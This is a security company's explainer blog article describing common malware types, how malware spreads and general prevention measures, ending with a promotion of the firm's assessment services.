Stay up to date
Stay up to date with the latest threat reports, articles & mistakes to avoid.
Simple, yet important content.
No salesy pitches and all that, promise!
Computers are machines driven by specific instruction sets governed by various rules and protocols known as operating systems. Just like the human body’s immune system is vulnerable to new viruses and their mutants, computers are prone to malware infections. We cover these basics and the different types of malware in this article.
Malware in electronic devices can result in software vulnerabilities, which may affect legitimate programs in the system. When it does, the result is often file damages and loss of essential information in the system.
What is Malware?
Malware is coined from malicious software, and it describes the programs or codes deliberately created to cause harm to a computer, networks or their users. These programs can perform malicious tasks such as recording keystrokes, altering programs or settings, information theft, steal, delete, modify or encrypt sensitive information, including financial information.
Malware history dates back to 1949, when a theory was proposed by a mathematician named John Von Neuman. He theorised that computing machines could modify themselves using elements in their environments. With the dawning of a new century, Malware has continued to evolve with the fast-growing worldwide web offering novel and profitable opportunities to monetise it.
Malware is dynamic in the various ways it attacks a computer, network or server. It is invented to invade a system so that cybercriminals may slip into the network at any convenient time. Malware launches its attack by taking charge of the host system and communicating confidential information, images, intellectual property back to its original sender.
In the many years that have followed, malware inventors have shown creativity in the various kinds created. This has led to various types of attacks, including disabling victim’s access to data for a ransom and ghost collection of user activity data.
Different Types of Malware
The most familiar types include computer viruses, computer worms, Ransomware, Keyloggers, Trojan horse and spyware. Others include Fileless Malware, Adware, Rootkits, Bots, RAM scraper, Mobile Malware.
Computer viruses are a type of malware that, when executed, self-replicate by modifying legitimate programs or host files by inserting their code. When this replication works successfully, it is the program or target file that is infected. This makes it tricky because malicious code is run through a legitimate program, and removing that may cause issues around the functioning of the underlying system. Anti-virus solutions work with this by quarantining or removing the infected file.
Computer viruses are a very uncommon form of malware these days. Not all malware programs are viruses.
A computer worm is a self-replicating malicious program that can spread through a network by cloning itself. Just by simply clicking on a worm-infested email, the infection could spread through an entire company.
Computer worms originated in the 1990s by email. History reports that about a decade ago, computer security measures were breached by worms arriving as attachments in emails.
Examples of computer worms include Iloveyou worm, SQL, Slammer, Stuxnet. These worms do harmful things like overload phone systems and disrupt television networks. They, unlike viruses, can spread without end-user action. Should you wish to read, we have covered an article on famous computer worms and fun facts.
Ransomware is a targeted approach aimed at controlling a target’s computer and locking software and files. The ransom attacker will ask for a payment to get files back and regain access to a computer. Supposedly, once they receive the payment, they will send a unique key to release it.
It is highly encouraged not to pay ransom demands though some businesses, including government organisations, have gone ahead to pay ransoms. Should you pay the ransom? There is no law around this, and it is something you should be thinking about in your security strategy.
Examples of famous ransomware are RYUK, Locky, WannaCry, NotPetya. Ransomware is mostly Trojans implying that they are propagated through social engineering (phishing, malicious USBs, vishing, etc.). Once ransomware finds its way to the target system, users files are encrypted within a few minutes. However, few programs take a different approach by observing the user for some time (often hours) before commencing users’ encryption. The malware admin operating ransomware attacks can delete or encrypt the victim’s safe backups. The admin can also decipher how much ransom the victim can yield.
Ransomware, once executed, can be hard to correct its damage without a robust backup. Fortunately, it is possible to prevent it. The process of unlocking encrypted files is tedious, requiring tools and technical expertise. The best advice is to have a robust offline backup of essential files in a safe hard drive that is immune to software vulnerabilities.
Keyloggers are known to monitor user keystrokes. Upon installation, keyloggers can steal sensitive information such as passwords, user IDs, banking details, etc. It is mainly used to steal information and monitor user activity. It can be introduced into a system through social engineering, phishing or malicious downloads from infected websites.
However, media have also highlighted controversial practices used by some employers utilising keyloggers to monitor employee activity. Moreover, keylogger application sellers are finding parents and guardians as their primary customers.
This leads to the famous question: Are keyloggers legal at work?
Yes, businesses are used to monitor employee activities, although it is not a widespread practice. On personal computers, keyloggers can be installed only if you are the owner of the computer. It is illegal to use keyloggers for criminal purposes, and you should not use these on systems where unauthorised to do so.
A trojan horse comes as a digital attack in the guise of desirable code or software. An example of a popular trojan is Emotet. Trojans are propagated by social engineering via spam emails, and they are now the preferred weapon choice for cybercriminals replacing computer worms. Trojans have been around longer than viruses, and they are known to affect more current computers than other types of malware.
Email is the most common form of targeting victims. A trojan is either downloaded as an attachment by the unsuspecting user or redirected to the infected websites. The false antivirus program is the most prevalent type of Trojan. It pops up when a victim uses the computer, suggesting an infection and an instruction to run a program to tidy up the computer. When users follow through with this suggestion, Trojan gets executed and begins to run its course.
Another example of Trojans prevalent among cybercriminals is Remote Access Trojans (RAT). A RAT is a malicious program that allows a backdoor connection for its operators. These programs are installed after luring the victim into executing an email attachment, installing a new application or a game. This new program installs and works normally while a backdoor connection providing access to its controllers behind the scenes.
Spyware is a type of malware that collects user activity information without their knowledge. Spyware usage is limited to cyber criminals and used by private organisations as these programs are used to keep track of activities of a user, device or computer. DarkHotel is an example of spyware that attacked business hotel visitors through hotels’ in-house Wi-Fi network.
Though Spyware may not be as malicious as others, the mechanism through which it is executed in a computer is similar to other malware that relies on social engineering based exploits. An example is Trojan which is also kicked off through social engineering. Users who detect the spyware program’s presence should know there is a weakness in the device that needs to be managed, mostly identified and removed by anti-virus solutions.
A backdoor is a covert communication channel that bypasses authentication or other main functions of a program. As the name suggests, it is similar to a backdoor of a place that accepts visitors based on who has access to its whereabouts.
Manufacturers have always supported backdoors to help customers reset user passwords or firmware upgrades in case of emergency access. However, in general, backdoors are not seen as a friendly software practice due to the secret nature of this program.
In cyberspace, backdoors could be identified or fall into the wrong hands where cyber criminals can enjoy unfettered access to products. This would allow easy ways to gain access, modify or exfiltrate sensitive data.
Examples of some of the most famous backdoors:
- DSL backdoor that was a hardware backdoor by Sercomm on port 32764
- PGP full-disk encryption backdoor
- Backdoors added into pirated copies of WordPress premium plug-ins
- Joomla plug-in backdoor
- Wisely used open-source ProFTPD was backdoored back in 2010
Fileless malware is more of an explanation of how it thrives. Unlike typical malware that invades and infects new systems through files, the fileless malware exploits and thrives using operating system objects (for example, registry keys, scheduled tasks or APIs) or via memory only. This type of malware comprises more than 50% of all the malware.
These attacks start by taking advantage of an already existing legitimate program, being launched as a sub-process. Another pathway of fileless attacks can be employing existing legitimate tools integrated into the system’s operating system. Some of the examples of fileless malware are Astaroth, Frodo, The Dark Avenger.
Fileless attacks are more difficult to detect because these easily piggyback on legitimate scripts or are part of scripts that initiate their communication with the server-side endpoint. PowerShell has been particularly popular in fileless attacks due to its ability to run directly from memory.
Discuss your concerns today
This malware type makes use of unsolicited advertising techniques. It is represented under types of malware though the majority of the adware is non-malicious in nature. Adware programs commonly act by redirecting compromised user’s browser searches to similar web pages that contain adverts for other products.
Common examples include pop up advertisements of products or ‘free’ version applications packaged with adware.
Malvertising, or malicious advertising, uses online malicious advertisements to spread malware and compromise systems. Generally, this occurs through the injection of unwanted or malicious code into ads.
Malvertising, or malicious advertising, uses advertisements as the main route to infect systems. It uses legitimate adverts or advert networks to pass on malware to target computers secretly. An example of malvertising is when cybercriminals pay to place an advert on a legitimate website maliciously. Clicking this ad by an unsuspecting user can also lead to the installation of malware in their PC. One of the most popular names is the Angler Exploit Kit.
Other situations occur through drive-by-downloads when malware in an advert executes itself automatically without the user performing any action. Cybercriminals can go as far as compromising ad networks that provide ads to various websites converting popular websites to vectors of malicious ads. Using malvertising has proven lucrative for cybercriminals as they can spread other malware (like ransomware or banking Trojans) to unsuspecting users.
Rootkits are a type of malware that allows the remote control to attackers over a victim’s computer. The most distinguishing feature of a rootkit is its ability to run at the Operating System level. This means giving up complete control of the system, i.e. administrative privileges to rootkit handlers (attackers).
Rootkits can spread through different ways, such as malicious downloads, compromised shared devices, malicious attachments and phishing. Rootkits can also be fed into applications, kernels, boot record, virtual machines or firmware. They can serve as a hideout for other malware (like the Keyloggers). An example of Rootkit is Zacinio which infects systems when users download a fake VPN app without knowing.
Bots and Botnets
Bots are essentially a combination of Trojans/worms that perform automated tasks on commands. They can be used for good, such as indexing search engines. Still, when used to propagate malicious intent, they evolve into self-propagating malware with the ability to connect back to a central server. A botnet is a network of bots used to activate wide floods of attacks such as DDoS attacks remotely controlled. An example of a Botnet is the popular Mirai that exploited insecure IoT devices and other systems into joining an attacker controlled botnet network that can be used for further large scale network attacks.
Malware affecting mobile devices are as diverse as those targeting computers, and they include mobile ransomware, spyware, trojans and madware. Madware is aggressive advertising, targeting smartphones and tablets.
Mobile malware can be distributed and infected in multiple ways, such as phishing, malicious application downloads. Jailbroken phones are increasingly vulnerable to such attacks. These phones lack the default protective features that the original operating system of the device had. An example is Triada, a modular Android mobile trojan that uses root privileges to replace files and change configuration settings.
As the name suggests, RAM scrappers mine temporarily stored data in memory or RAM (Random Access Memory). It targets point-of-sale systems, for example, cash registers. It is because they can, for a short duration, store unencrypted credit card numbers before they encrypt and pass them to the back-end.
How malware attacks and spreads?
The following are the most common techniques detailing how malware spreads.
- Vulnerabilities: Malware takes advantage of the weaknesses in a system, network or hardware component to gain access and perform further tasks as per instructions from attackers. Sometimes, initial access gained lacks higher privileges such as administrator or root equivalent access needed to modify programs and settings. A threat actor then utilises privilege escalation attacks such as PowerShell fileless or similar attempts to gain full control.
- Backdoors: A secret entry route to the hardware, software, or networks either left intentionally or unintentionally.
- Drive-by downloads: Malicious downloads and execution without the knowledge of user either by visiting infected websites or executing email attachments
- Flat networks: Organisations with flat network topology without internal firewalling or similar segregations to control traffic flows. Lack of a defence-in-depth approach towards security offers an easier route for infections across their network.
- Hybrid threats: Multiple characteristics of common types of malware are sometimes combined to evade detection mechanisms and maintain a long term foothold on the victim computers.
How to find and remove malware?
Based on the infection, it may or may not be wise to identify and remove malware. In the case of a traditional trojan, virus, worm or similar program, it may not be difficult to find running programs and reversing the processes and events to figure out what happened. However, fileless malware attacks are making it much more difficult to identify attacks.
Sometimes, even after taking the precautionary steps to remove malware, malicious code may still be remnant on the infected computer. Usually, it is preferred to ensure regular backups are reimaging a system or restoring to the previous state.
Preventing the malware attacks requires multiple action items in your list:
- Patch management
- Office macros protection
- Vulnerability management
- Secure configuration baselines
- Secure remote access
- User education
- Multi-factor authentication on external and business-critical assets
- Endpoint protection
- Segregation at user, network and environment levels
- Web and email filtering
- Logging and monitoring controls
- Regular backups and test backup restore
Discuss your concerns today
How can Cyphere help you?
Cyphere helps businesses protect their most prized assets from unauthorised access.
Cyphere offers technical security assessments, managed services, data privacy and threat intel services. By performing IT health checks, third party validation assessments such as web applications and network penetration tests, businesses can find unknown risks and gaps in their IT security strategies. All deliverables involve thorough reporting of risks and impact, probability and recommendations towards a risk remediation plan.
Managed services provide continuous threat checks around external and internal networks and applications. It helps improve security posture on an ongoing basis and acting before threat actors can attempt attacks.
Get in touch to discuss your security concerns or for a free quote for our services.